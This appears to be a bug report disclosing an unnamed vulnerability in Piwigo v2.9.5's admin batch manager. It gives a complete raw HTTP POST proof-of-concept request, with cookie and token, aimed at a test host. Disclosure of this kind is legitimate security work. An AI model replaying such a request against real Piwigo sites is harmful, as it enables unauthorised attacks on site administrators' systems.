Hi, there is a vulnerability in admin/batch_manager.php.
I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.
```
POST /admin.php?page=batch_manager HTTP/1.1
Host: 10.150.10.186:30002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 695
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
Connection: close
Upgrade-Insecure-Requests: 1

start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicates_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_ratio=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_max=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=0&regenerateSuccess=0&regenerateError=0
```
discovered on Piwigo v2.9.5
fccb6ca
plegall